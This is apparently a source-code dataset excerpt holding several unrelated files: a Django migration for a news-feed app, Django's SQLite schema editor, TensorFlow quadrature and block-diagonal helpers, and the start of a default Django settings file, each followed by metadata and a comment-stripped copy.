ERROR_APP_ID_NOT_FOUND = 3
ERROR_BAD_TOKEN = 4
ERROR_TOKEN_NOT_FOUND = 5
ERROR_TARIFF_NOT_PAID = 6
ERROR_MASTER_NOT_FOUND = 7
ERROR_SYSTEM_BUSY = 8
ERROR_BAD_PAYLOAD = 9
ERROR_PROJECT_NOT_FOUND = 10
ERROR_BAD_PROFILE = 11
ERROR_PROFILE_NOT_FOUND = 12
ERROR_BAD_TOKENS = 13
ERROR_FIELD_REQUIRED = 14
FPS_DRM_KEYGENERATOR_URI_TEMPLATE = (
'https://cpix.ezdrm.com/KeyGenerator/cpix.aspx?k=%s&u=%s&p=%s&c=resourcename&m=2'
)
CENC_DRM_KEYGENERATOR_URI_TEMPLATE = (
'https://cpix.ezdrm.com/KeyGenerator/cpix.aspx?k=%s&u=%s&p=%s&c=resourcename&m=1'
)
DRM_KEY_URL_TEMPLATE = 'skd://fps.ezdrm.com/;%s'
| true | true |
f72355eeda4659e76ec7ec6a6e9be9c0433cbe74 | 1,829 | py | Python | NewsFeed/migrations/0001_initial.py | 1104028/StrativNewsFeed | 4499cbb17141ca1aa19d3fd00071828ff9ab3d7a | [
"Python-2.0",
"OLDAP-2.3"
] | null | null | null | NewsFeed/migrations/0001_initial.py | 1104028/StrativNewsFeed | 4499cbb17141ca1aa19d3fd00071828ff9ab3d7a | [
"Python-2.0",
"OLDAP-2.3"
] | null | null | null | NewsFeed/migrations/0001_initial.py | 1104028/StrativNewsFeed | 4499cbb17141ca1aa19d3fd00071828ff9ab3d7a | [
"Python-2.0",
"OLDAP-2.3"
] | null | null | null | # Generated by Django 3.2.9 on 2021-11-23 14:07
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated initial migration for the NewsFeed app: creates the
    # Countries, Keywords, Sources and Mapper tables. Do not hand-edit the
    # operations; generate a follow-up migration instead.

    initial = True

    dependencies = [
        # Mapper.user references the project's user model.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='Countries',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('countryName', models.CharField(max_length=100)),
                ('created', models.DateTimeField(auto_now_add=True)),
            ],
        ),
        migrations.CreateModel(
            name='Keywords',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('keyword', models.CharField(max_length=100)),
                ('created', models.DateTimeField(auto_now_add=True)),
            ],
        ),
        migrations.CreateModel(
            name='Sources',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('sourceName', models.CharField(max_length=100)),
                ('created', models.DateTimeField(auto_now_add=True)),
            ],
        ),
        migrations.CreateModel(
            name='Mapper',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('itemName', models.CharField(max_length=100)),
                # Deleting a user cascades to their Mapper rows.
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
| 36.58 | 118 | 0.585019 |
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Countries',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('countryName', models.CharField(max_length=100)),
('created', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='Keywords',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('keyword', models.CharField(max_length=100)),
('created', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='Sources',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sourceName', models.CharField(max_length=100)),
('created', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='Mapper',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('itemName', models.CharField(max_length=100)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| true | true |
f72357e45901d3bd648fdb6e6edab0bcae3bad14 | 13,930 | py | Python | oadenv/lib/python2.7/site-packages/django/db/backends/sqlite3/schema.py | isabernardes/Archaeodatabase | 86090e8f840d5d202c15906e614d683f8a12d3bc | [
"MIT"
] | 7 | 2017-02-12T06:03:00.000Z | 2020-12-31T11:57:35.000Z | oadenv/lib/python2.7/site-packages/django/db/backends/sqlite3/schema.py | isabernardes/Archaeodatabase | 86090e8f840d5d202c15906e614d683f8a12d3bc | [
"MIT"
] | 10 | 2017-07-13T00:24:03.000Z | 2017-07-17T07:39:03.000Z | oadenv/lib/python2.7/site-packages/django/db/backends/sqlite3/schema.py | isabernardes/Archaeodatabase | 86090e8f840d5d202c15906e614d683f8a12d3bc | [
"MIT"
] | 7 | 2017-08-01T04:02:07.000Z | 2018-10-06T21:07:20.000Z | import codecs
import contextlib
import copy
from decimal import Decimal
from django.apps.registry import Apps
from django.db.backends.base.schema import BaseDatabaseSchemaEditor
from django.utils import six
class DatabaseSchemaEditor(BaseDatabaseSchemaEditor):
    """Schema editor for SQLite.

    SQLite supports almost no in-place ALTER TABLE operations, so most
    alterations are implemented by rebuilding the whole table (see
    ``_remake_table``).
    """

    sql_delete_table = "DROP TABLE %(table)s"
    sql_create_inline_fk = "REFERENCES %(to_table)s (%(to_column)s)"
    sql_create_unique = "CREATE UNIQUE INDEX %(name)s ON %(table)s (%(columns)s)"
    sql_delete_unique = "DROP INDEX %(name)s"

    def __enter__(self):
        with self.connection.cursor() as c:
            # Some SQLite schema alterations need foreign key constraints to be
            # disabled. This is the default in SQLite but can be changed with a
            # build flag and might change in future, so can't be relied upon.
            # We enforce it here for the duration of the transaction.
            c.execute('PRAGMA foreign_keys')
            self._initial_pragma_fk = c.fetchone()[0]
            c.execute('PRAGMA foreign_keys = 0')
        return super(DatabaseSchemaEditor, self).__enter__()

    def __exit__(self, exc_type, exc_value, traceback):
        super(DatabaseSchemaEditor, self).__exit__(exc_type, exc_value, traceback)
        with self.connection.cursor() as c:
            # Restore initial FK setting - PRAGMA values can't be parametrized
            c.execute('PRAGMA foreign_keys = %s' % int(self._initial_pragma_fk))

    def quote_value(self, value):
        """Return `value` rendered as an inline SQLite SQL literal."""
        # The backend "mostly works" without this function and there are use
        # cases for compiling Python without the sqlite3 libraries (e.g.
        # security hardening).
        try:
            import sqlite3
            value = sqlite3.adapt(value)
        except ImportError:
            pass
        except sqlite3.ProgrammingError:
            pass
        # Manual emulation of SQLite parameter quoting
        if isinstance(value, type(True)):
            return str(int(value))
        elif isinstance(value, (Decimal, float)):
            return str(value)
        elif isinstance(value, six.integer_types):
            return str(value)
        elif isinstance(value, six.string_types):
            return "'%s'" % six.text_type(value).replace("\'", "\'\'")
        elif value is None:
            return "NULL"
        elif isinstance(value, (bytes, bytearray, six.memoryview)):
            # Bytes are only allowed for BLOB fields, encoded as string
            # literals containing hexadecimal data and preceded by a single "X"
            # character:
            # value = b'\x01\x02' => value_hex = b'0102' => return X'0102'
            value = bytes(value)
            hex_encoder = codecs.getencoder('hex_codec')
            value_hex, _length = hex_encoder(value)
            # Use 'ascii' encoding for b'01' => '01', no need to use force_text here.
            return "X'%s'" % value_hex.decode('ascii')
        else:
            raise ValueError("Cannot quote parameter value %r of type %s" % (value, type(value)))

    # Note: the field-list parameters use immutable tuple defaults instead of
    # the mutable `[]` defaults (a shared-state hazard); they are only
    # iterated, so any iterable of fields is accepted.
    def _remake_table(self, model, create_fields=(), delete_fields=(), alter_fields=(), override_uniques=None,
                      override_indexes=None):
        """
        Shortcut to transform a model from old_model into new_model
        The essential steps are:
        1. rename the model's existing table, e.g. "app_model" to "app_model__old"
        2. create a table with the updated definition called "app_model"
        3. copy the data from the old renamed table to the new table
        4. delete the "app_model__old" table
        """
        # Self-referential fields must be recreated rather than copied from
        # the old model to ensure their remote_field.field_name doesn't refer
        # to an altered field.
        def is_self_referential(f):
            return f.is_relation and f.remote_field.model is model
        # Work out the new fields dict / mapping
        body = {
            f.name: f.clone() if is_self_referential(f) else f
            for f in model._meta.local_concrete_fields
        }
        # Since mapping might mix column names and default values,
        # its values must be already quoted.
        mapping = {f.column: self.quote_name(f.column) for f in model._meta.local_concrete_fields}
        # This maps field names (not columns) for things like unique_together
        rename_mapping = {}
        # If any of the new or altered fields is introducing a new PK,
        # remove the old one
        restore_pk_field = None
        if any(f.primary_key for f in create_fields) or any(n.primary_key for o, n in alter_fields):
            for name, field in list(body.items()):
                if field.primary_key:
                    field.primary_key = False
                    restore_pk_field = field
                    if field.auto_created:
                        del body[name]
                        del mapping[field.column]
        # Add in any created fields
        for field in create_fields:
            body[field.name] = field
            # Choose a default and insert it into the copy map
            if not field.many_to_many and field.concrete:
                mapping[field.column] = self.quote_value(
                    self.effective_default(field)
                )
        # Add in any altered fields
        for (old_field, new_field) in alter_fields:
            body.pop(old_field.name, None)
            mapping.pop(old_field.column, None)
            body[new_field.name] = new_field
            if old_field.null and not new_field.null:
                # Backfill NULLs with the new field's default so the NOT NULL
                # constraint on the rebuilt table is satisfied.
                case_sql = "coalesce(%(col)s, %(default)s)" % {
                    'col': self.quote_name(old_field.column),
                    'default': self.quote_value(self.effective_default(new_field))
                }
                mapping[new_field.column] = case_sql
            else:
                mapping[new_field.column] = self.quote_name(old_field.column)
            rename_mapping[old_field.name] = new_field.name
        # Remove any deleted fields
        for field in delete_fields:
            del body[field.name]
            del mapping[field.column]
            # Remove any implicit M2M tables
            if field.many_to_many and field.remote_field.through._meta.auto_created:
                return self.delete_model(field.remote_field.through)
        # Work inside a new app registry
        apps = Apps()
        # Provide isolated instances of the fields to the new model body so
        # that the existing model's internals aren't interfered with when
        # the dummy model is constructed.
        body = copy.deepcopy(body)
        # Work out the new value of unique_together, taking renames into
        # account
        if override_uniques is None:
            override_uniques = [
                [rename_mapping.get(n, n) for n in unique]
                for unique in model._meta.unique_together
            ]
        # Work out the new value for index_together, taking renames into
        # account
        if override_indexes is None:
            override_indexes = [
                [rename_mapping.get(n, n) for n in index]
                for index in model._meta.index_together
            ]
        # Construct a new model for the new state
        meta_contents = {
            'app_label': model._meta.app_label,
            'db_table': model._meta.db_table,
            'unique_together': override_uniques,
            'index_together': override_indexes,
            'apps': apps,
        }
        meta = type("Meta", tuple(), meta_contents)
        body['Meta'] = meta
        body['__module__'] = model.__module__
        temp_model = type(model._meta.object_name, model.__bases__, body)
        # We need to modify model._meta.db_table, but everything explodes
        # if the change isn't reversed before the end of this method. This
        # context manager helps us avoid that situation.
        @contextlib.contextmanager
        def altered_table_name(model, temporary_table_name):
            original_table_name = model._meta.db_table
            model._meta.db_table = temporary_table_name
            yield
            model._meta.db_table = original_table_name
        with altered_table_name(model, model._meta.db_table + "__old"):
            # Rename the old table to make way for the new
            self.alter_db_table(model, temp_model._meta.db_table, model._meta.db_table)
            # Create a new table with the updated schema. We remove things
            # from the deferred SQL that match our table name, too
            self.deferred_sql = [x for x in self.deferred_sql if temp_model._meta.db_table not in x]
            self.create_model(temp_model)
            # Copy data from the old table into the new table
            field_maps = list(mapping.items())
            self.execute("INSERT INTO %s (%s) SELECT %s FROM %s" % (
                self.quote_name(temp_model._meta.db_table),
                ', '.join(self.quote_name(x) for x, y in field_maps),
                ', '.join(y for x, y in field_maps),
                self.quote_name(model._meta.db_table),
            ))
            # Delete the old table
            self.delete_model(model, handle_autom2m=False)
        # Run deferred SQL on correct table
        for sql in self.deferred_sql:
            self.execute(sql)
        self.deferred_sql = []
        # Fix any PK-removed field
        if restore_pk_field:
            restore_pk_field.primary_key = True

    def delete_model(self, model, handle_autom2m=True):
        """Drop the model's table (and auto-created M2M tables by default)."""
        if handle_autom2m:
            super(DatabaseSchemaEditor, self).delete_model(model)
        else:
            # Delete the table (and only that)
            self.execute(self.sql_delete_table % {
                "table": self.quote_name(model._meta.db_table),
            })

    def add_field(self, model, field):
        """
        Creates a field on a model.
        Usually involves adding a column, but may involve adding a
        table instead (for M2M fields)
        """
        # Special-case implicit M2M tables
        if field.many_to_many and field.remote_field.through._meta.auto_created:
            return self.create_model(field.remote_field.through)
        self._remake_table(model, create_fields=[field])

    def remove_field(self, model, field):
        """
        Removes a field from a model. Usually involves deleting a column,
        but for M2Ms may involve deleting a table.
        """
        # M2M fields are a special case
        if field.many_to_many:
            # For implicit M2M tables, delete the auto-created table
            if field.remote_field.through._meta.auto_created:
                self.delete_model(field.remote_field.through)
            # For explicit "through" M2M fields, do nothing
        # For everything else, remake.
        else:
            # It might not actually have a column behind it
            if field.db_parameters(connection=self.connection)['type'] is None:
                return
            self._remake_table(model, delete_fields=[field])

    def _alter_field(self, model, old_field, new_field, old_type, new_type,
                     old_db_params, new_db_params, strict=False):
        """Actually perform a "physical" (non-ManyToMany) field update."""
        # Alter by remaking table
        self._remake_table(model, alter_fields=[(old_field, new_field)])

    def alter_index_together(self, model, old_index_together, new_index_together):
        """
        Deals with a model changing its index_together.
        Note: The input index_togethers must be doubly-nested, not the single-
        nested ["foo", "bar"] format.
        """
        self._remake_table(model, override_indexes=new_index_together)

    def alter_unique_together(self, model, old_unique_together, new_unique_together):
        """
        Deals with a model changing its unique_together.
        Note: The input unique_togethers must be doubly-nested, not the single-
        nested ["foo", "bar"] format.
        """
        self._remake_table(model, override_uniques=new_unique_together)

    def _alter_many_to_many(self, model, old_field, new_field, strict):
        """
        Alters M2Ms to repoint their to= endpoints.
        """
        if old_field.remote_field.through._meta.db_table == new_field.remote_field.through._meta.db_table:
            # The field name didn't change, but some options did; we have to propagate this altering.
            self._remake_table(
                old_field.remote_field.through,
                alter_fields=[(
                    # We need the field that points to the target model, so we can tell alter_field to change it -
                    # this is m2m_reverse_field_name() (as opposed to m2m_field_name, which points to our model)
                    old_field.remote_field.through._meta.get_field(old_field.m2m_reverse_field_name()),
                    new_field.remote_field.through._meta.get_field(new_field.m2m_reverse_field_name()),
                )],
                override_uniques=(new_field.m2m_field_name(), new_field.m2m_reverse_field_name()),
            )
            return
        # Make a new through table
        self.create_model(new_field.remote_field.through)
        # Copy the data across
        self.execute("INSERT INTO %s (%s) SELECT %s FROM %s" % (
            self.quote_name(new_field.remote_field.through._meta.db_table),
            ', '.join([
                "id",
                new_field.m2m_column_name(),
                new_field.m2m_reverse_name(),
            ]),
            ', '.join([
                "id",
                old_field.m2m_column_name(),
                old_field.m2m_reverse_name(),
            ]),
            self.quote_name(old_field.remote_field.through._meta.db_table),
        ))
        # Delete the old through table
        self.delete_model(old_field.remote_field.through)
| 44.935484 | 114 | 0.616009 | import codecs
import contextlib
import copy
from decimal import Decimal
from django.apps.registry import Apps
from django.db.backends.base.schema import BaseDatabaseSchemaEditor
from django.utils import six
class DatabaseSchemaEditor(BaseDatabaseSchemaEditor):
sql_delete_table = "DROP TABLE %(table)s"
sql_create_inline_fk = "REFERENCES %(to_table)s (%(to_column)s)"
sql_create_unique = "CREATE UNIQUE INDEX %(name)s ON %(table)s (%(columns)s)"
sql_delete_unique = "DROP INDEX %(name)s"
def __enter__(self):
with self.connection.cursor() as c:
# We enforce it here for the duration of the transaction.
c.execute('PRAGMA foreign_keys')
self._initial_pragma_fk = c.fetchone()[0]
c.execute('PRAGMA foreign_keys = 0')
return super(DatabaseSchemaEditor, self).__enter__()
def __exit__(self, exc_type, exc_value, traceback):
super(DatabaseSchemaEditor, self).__exit__(exc_type, exc_value, traceback)
with self.connection.cursor() as c:
# Restore initial FK setting - PRAGMA values can't be parametrized
c.execute('PRAGMA foreign_keys = %s' % int(self._initial_pragma_fk))
def quote_value(self, value):
try:
import sqlite3
value = sqlite3.adapt(value)
except ImportError:
pass
except sqlite3.ProgrammingError:
pass
if isinstance(value, type(True)):
return str(int(value))
elif isinstance(value, (Decimal, float)):
return str(value)
elif isinstance(value, six.integer_types):
return str(value)
elif isinstance(value, six.string_types):
return "'%s'" % six.text_type(value).replace("\'", "\'\'")
elif value is None:
return "NULL"
elif isinstance(value, (bytes, bytearray, six.memoryview)):
# Bytes are only allowed for BLOB fields, encoded as string
# literals containing hexadecimal data and preceded by a single "X"
# character:
# value = b'\x01\x02' => value_hex = b'0102' => return X'0102'
value = bytes(value)
hex_encoder = codecs.getencoder('hex_codec')
value_hex, _length = hex_encoder(value)
# Use 'ascii' encoding for b'01' => '01', no need to use force_text here.
return "X'%s'" % value_hex.decode('ascii')
else:
raise ValueError("Cannot quote parameter value %r of type %s" % (value, type(value)))
def _remake_table(self, model, create_fields=[], delete_fields=[], alter_fields=[], override_uniques=None,
override_indexes=None):
# Self-referential fields must be recreated rather than copied from
# the old model to ensure their remote_field.field_name doesn't refer
def is_self_referential(f):
return f.is_relation and f.remote_field.model is model
body = {
f.name: f.clone() if is_self_referential(f) else f
for f in model._meta.local_concrete_fields
}
mapping = {f.column: self.quote_name(f.column) for f in model._meta.local_concrete_fields}
rename_mapping = {}
restore_pk_field = None
if any(f.primary_key for f in create_fields) or any(n.primary_key for o, n in alter_fields):
for name, field in list(body.items()):
if field.primary_key:
field.primary_key = False
restore_pk_field = field
if field.auto_created:
del body[name]
del mapping[field.column]
for field in create_fields:
body[field.name] = field
if not field.many_to_many and field.concrete:
mapping[field.column] = self.quote_value(
self.effective_default(field)
)
for (old_field, new_field) in alter_fields:
body.pop(old_field.name, None)
mapping.pop(old_field.column, None)
body[new_field.name] = new_field
if old_field.null and not new_field.null:
case_sql = "coalesce(%(col)s, %(default)s)" % {
'col': self.quote_name(old_field.column),
'default': self.quote_value(self.effective_default(new_field))
}
mapping[new_field.column] = case_sql
else:
mapping[new_field.column] = self.quote_name(old_field.column)
rename_mapping[old_field.name] = new_field.name
for field in delete_fields:
del body[field.name]
del mapping[field.column]
if field.many_to_many and field.remote_field.through._meta.auto_created:
return self.delete_model(field.remote_field.through)
apps = Apps()
body = copy.deepcopy(body)
if override_uniques is None:
override_uniques = [
[rename_mapping.get(n, n) for n in unique]
for unique in model._meta.unique_together
]
if override_indexes is None:
override_indexes = [
[rename_mapping.get(n, n) for n in index]
for index in model._meta.index_together
]
meta_contents = {
'app_label': model._meta.app_label,
'db_table': model._meta.db_table,
'unique_together': override_uniques,
'index_together': override_indexes,
'apps': apps,
}
meta = type("Meta", tuple(), meta_contents)
body['Meta'] = meta
body['__module__'] = model.__module__
temp_model = type(model._meta.object_name, model.__bases__, body)
# context manager helps us avoid that situation.
@contextlib.contextmanager
def altered_table_name(model, temporary_table_name):
original_table_name = model._meta.db_table
model._meta.db_table = temporary_table_name
yield
model._meta.db_table = original_table_name
with altered_table_name(model, model._meta.db_table + "__old"):
# Rename the old table to make way for the new
self.alter_db_table(model, temp_model._meta.db_table, model._meta.db_table)
# Create a new table with the updated schema. We remove things
# from the deferred SQL that match our table name, too
self.deferred_sql = [x for x in self.deferred_sql if temp_model._meta.db_table not in x]
self.create_model(temp_model)
# Copy data from the old table into the new table
field_maps = list(mapping.items())
self.execute("INSERT INTO %s (%s) SELECT %s FROM %s" % (
self.quote_name(temp_model._meta.db_table),
', '.join(self.quote_name(x) for x, y in field_maps),
', '.join(y for x, y in field_maps),
self.quote_name(model._meta.db_table),
))
# Delete the old table
self.delete_model(model, handle_autom2m=False)
# Run deferred SQL on correct table
for sql in self.deferred_sql:
self.execute(sql)
self.deferred_sql = []
# Fix any PK-removed field
if restore_pk_field:
restore_pk_field.primary_key = True
def delete_model(self, model, handle_autom2m=True):
if handle_autom2m:
super(DatabaseSchemaEditor, self).delete_model(model)
else:
# Delete the table (and only that)
self.execute(self.sql_delete_table % {
"table": self.quote_name(model._meta.db_table),
})
def add_field(self, model, field):
# Special-case implicit M2M tables
if field.many_to_many and field.remote_field.through._meta.auto_created:
return self.create_model(field.remote_field.through)
self._remake_table(model, create_fields=[field])
def remove_field(self, model, field):
# M2M fields are a special case
if field.many_to_many:
# For implicit M2M tables, delete the auto-created table
if field.remote_field.through._meta.auto_created:
self.delete_model(field.remote_field.through)
# For explicit "through" M2M fields, do nothing
# For everything else, remake.
else:
# It might not actually have a column behind it
if field.db_parameters(connection=self.connection)['type'] is None:
return
self._remake_table(model, delete_fields=[field])
def _alter_field(self, model, old_field, new_field, old_type, new_type,
old_db_params, new_db_params, strict=False):
# Alter by remaking table
self._remake_table(model, alter_fields=[(old_field, new_field)])
def alter_index_together(self, model, old_index_together, new_index_together):
self._remake_table(model, override_indexes=new_index_together)
def alter_unique_together(self, model, old_unique_together, new_unique_together):
self._remake_table(model, override_uniques=new_unique_together)
def _alter_many_to_many(self, model, old_field, new_field, strict):
if old_field.remote_field.through._meta.db_table == new_field.remote_field.through._meta.db_table:
# The field name didn't change, but some options did; we have to propagate this altering.
self._remake_table(
old_field.remote_field.through,
alter_fields=[(
old_field.remote_field.through._meta.get_field(old_field.m2m_reverse_field_name()),
new_field.remote_field.through._meta.get_field(new_field.m2m_reverse_field_name()),
)],
override_uniques=(new_field.m2m_field_name(), new_field.m2m_reverse_field_name()),
)
return
self.create_model(new_field.remote_field.through)
self.execute("INSERT INTO %s (%s) SELECT %s FROM %s" % (
self.quote_name(new_field.remote_field.through._meta.db_table),
', '.join([
"id",
new_field.m2m_column_name(),
new_field.m2m_reverse_name(),
]),
', '.join([
"id",
old_field.m2m_column_name(),
old_field.m2m_reverse_name(),
]),
self.quote_name(old_field.remote_field.through._meta.db_table),
))
self.delete_model(old_field.remote_field.through)
| true | true |
f7235867e61a5294df71164c7d23ca05c60ae529 | 3,448 | py | Python | SVGPs/functions.py | vincentadam87/SVGPs | 0de1194bf0f24997148dfce0cd6fbffae16fb3bc | [
"Apache-2.0"
] | 3 | 2017-09-28T21:02:58.000Z | 2018-02-06T17:58:48.000Z | SVGPs/functions.py | vincentadam87/SVGPs | 0de1194bf0f24997148dfce0cd6fbffae16fb3bc | [
"Apache-2.0"
] | null | null | null | SVGPs/functions.py | vincentadam87/SVGPs | 0de1194bf0f24997148dfce0cd6fbffae16fb3bc | [
"Apache-2.0"
] | null | null | null | # Copyright 2016 James Hensman, alexggmatthews
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------
# Modification notice:
# This file was modified by Vincent ADAM
# ------------------------------------------
import tensorflow as tf
from settings import float_type
from quadrature import hermgauss
import numpy as np
def eye(N):
    """
    The N x N identity matrix, with entries of the configured float type.
    """
    diagonal = tf.ones(tf.stack([N]), dtype=float_type)
    return tf.diag(diagonal)
def variational_expectations(Fmu, Fvar, phi, num_gauss_hermite_points=20):
    """
    Compute the expected value of a function phi under a Gaussian
    distribution for the input values.
    if
        q(f) = N(Fmu, Fvar)
    then this method computes
       \int phi(f) q(f) df.
    Here, we implement a default Gauss-Hermite quadrature routine
    """
    nodes, weights = hermgauss(num_gauss_hermite_points)
    nodes = nodes.reshape(1, -1)
    # Normalise the Hermite weights so they sum to one under N(0, 1).
    weights = weights.reshape(-1, 1) / np.sqrt(np.pi)
    original_shape = tf.shape(Fmu)
    mean = tf.reshape(Fmu, (-1, 1))
    variance = tf.reshape(Fvar, (-1, 1))
    # Map the standard quadrature nodes onto each Gaussian N(mean, variance).
    eval_points = mean + tf.sqrt(2.0 * variance) * nodes
    phi_values = phi(eval_points)
    return tf.reshape(tf.matmul(phi_values, weights), original_shape)
import tensorflow as tf
def block_diagonal(matrices, dtype=tf.float32):
    r"""Constructs block-diagonal matrices from a list of batched 2D tensors.

    Args:
      matrices: A list of Tensors with shape [..., N_i, M_i] (i.e. a list of
        matrices with the same batch dimension).
      dtype: Data type to use. The Tensors in `matrices` must match this dtype.

    Returns:
      A matrix with the input matrices stacked along its main diagonal, having
      shape [..., \sum_i N_i, \sum_i M_i].
    """
    matrices = [tf.convert_to_tensor(matrix, dtype=dtype) for matrix in matrices]
    # Accumulate the static (graph-construction-time) output shape.
    blocked_rows = tf.Dimension(0)
    blocked_cols = tf.Dimension(0)
    batch_shape = tf.TensorShape(None)
    for matrix in matrices:
        full_matrix_shape = matrix.get_shape().with_rank_at_least(2)
        # All inputs must agree on the leading batch dimensions.
        batch_shape = batch_shape.merge_with(full_matrix_shape[:-2])
        blocked_rows += full_matrix_shape[-2]
        blocked_cols += full_matrix_shape[-1]
    # Dynamic total column count = sum of each block's last dimension.
    ret_columns_list = []
    for matrix in matrices:
        matrix_shape = tf.shape(matrix)
        ret_columns_list.append(matrix_shape[-1])
    ret_columns = tf.add_n(ret_columns_list)
    # Pad each block left/right with zeros so its columns land at the right
    # offset of the final matrix; only the last axis is padded.
    row_blocks = []
    current_column = 0
    for matrix in matrices:
        matrix_shape = tf.shape(matrix)
        row_before_length = current_column
        current_column += matrix_shape[-1]
        row_after_length = ret_columns - current_column
        row_blocks.append(tf.pad(
            tensor=matrix,
            paddings=tf.concat(
                [tf.zeros([tf.rank(matrix) - 1, 2], dtype=tf.int32),
                 [(row_before_length, row_after_length)]],
                axis=0)))
    # Stack padded blocks along the row axis and attach the static shape.
    blocked = tf.concat(row_blocks, -2)
    blocked.set_shape(batch_shape.concatenate((blocked_rows, blocked_cols)))
    return blocked | 35.916667 | 81 | 0.660673 |
import tensorflow as tf
from settings import float_type
from quadrature import hermgauss
import numpy as np
def eye(N):
    """Return an N x N identity matrix (diagonal of ones, dtype ``float_type``)."""
    return tf.diag(tf.ones(tf.stack([N, ]), dtype=float_type))
def variational_expectations( Fmu, Fvar, phi, num_gauss_hermite_points=20):
    r"""Gauss-Hermite approximation of \int phi(f) N(f|Fmu, Fvar) df, elementwise."""
    gh_x, gh_w = hermgauss(num_gauss_hermite_points)
    gh_x = gh_x.reshape(1, -1)
    # Normalise Hermite weights to sum to one under the Gaussian measure.
    gh_w = gh_w.reshape(-1, 1) / np.sqrt(np.pi)
    shape = tf.shape(Fmu)
    Fmu, Fvar = [tf.reshape(e, (-1, 1)) for e in (Fmu, Fvar)]
    X = gh_x * tf.sqrt(2.0 * Fvar) + Fmu
    logp = phi(X)
    # Weighted sum over nodes, restored to the input shape.
    return tf.reshape(tf.matmul(logp, gh_w), shape)
import tensorflow as tf
def block_diagonal(matrices, dtype=tf.float32):
    r"""Stack batched 2D tensors [..., N_i, M_i] into one block-diagonal
    matrix of shape [..., \sum_i N_i, \sum_i M_i]."""
    matrices = [tf.convert_to_tensor(matrix, dtype=dtype) for matrix in matrices]
    blocked_rows = tf.Dimension(0)
    blocked_cols = tf.Dimension(0)
    batch_shape = tf.TensorShape(None)
    # Static output shape: merge batch dims, sum the trailing two dims.
    for matrix in matrices:
        full_matrix_shape = matrix.get_shape().with_rank_at_least(2)
        batch_shape = batch_shape.merge_with(full_matrix_shape[:-2])
        blocked_rows += full_matrix_shape[-2]
        blocked_cols += full_matrix_shape[-1]
    ret_columns_list = []
    for matrix in matrices:
        matrix_shape = tf.shape(matrix)
        ret_columns_list.append(matrix_shape[-1])
    ret_columns = tf.add_n(ret_columns_list)
    # Zero-pad each block's columns to its offset in the final matrix.
    row_blocks = []
    current_column = 0
    for matrix in matrices:
        matrix_shape = tf.shape(matrix)
        row_before_length = current_column
        current_column += matrix_shape[-1]
        row_after_length = ret_columns - current_column
        row_blocks.append(tf.pad(
            tensor=matrix,
            paddings=tf.concat(
                [tf.zeros([tf.rank(matrix) - 1, 2], dtype=tf.int32),
                 [(row_before_length, row_after_length)]],
                axis=0)))
    blocked = tf.concat(row_blocks, -2)
    blocked.set_shape(batch_shape.concatenate((blocked_rows, blocked_cols)))
    return blocked | true | true |
f72359533daf16ad3957d382b5870b5ada9afd4f | 3,181 | py | Python | innova_aula/innova_aula/settings.py | ClaudioCaniullan/innova_aula | fa89c80d0c3dec00067d3ccc53656474524b4b77 | [
"CC0-1.0"
] | null | null | null | innova_aula/innova_aula/settings.py | ClaudioCaniullan/innova_aula | fa89c80d0c3dec00067d3ccc53656474524b4b77 | [
"CC0-1.0"
] | null | null | null | innova_aula/innova_aula/settings.py | ClaudioCaniullan/innova_aula | fa89c80d0c3dec00067d3ccc53656474524b4b77 | [
"CC0-1.0"
] | null | null | null | """
Django settings for innova_aula project.
Generated by 'django-admin startproject' using Django 2.2.19.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): the key is committed to source here -- load it from an
# environment variable (e.g. os.environ['SECRET_KEY']) before deploying.
SECRET_KEY = 'h8v7g_j4o+j6p_7u8j8iagb)&4kl8x3=-^ebx*aad&ru^0%__r'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# Empty list is fine while DEBUG is True; production needs real hostnames.
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
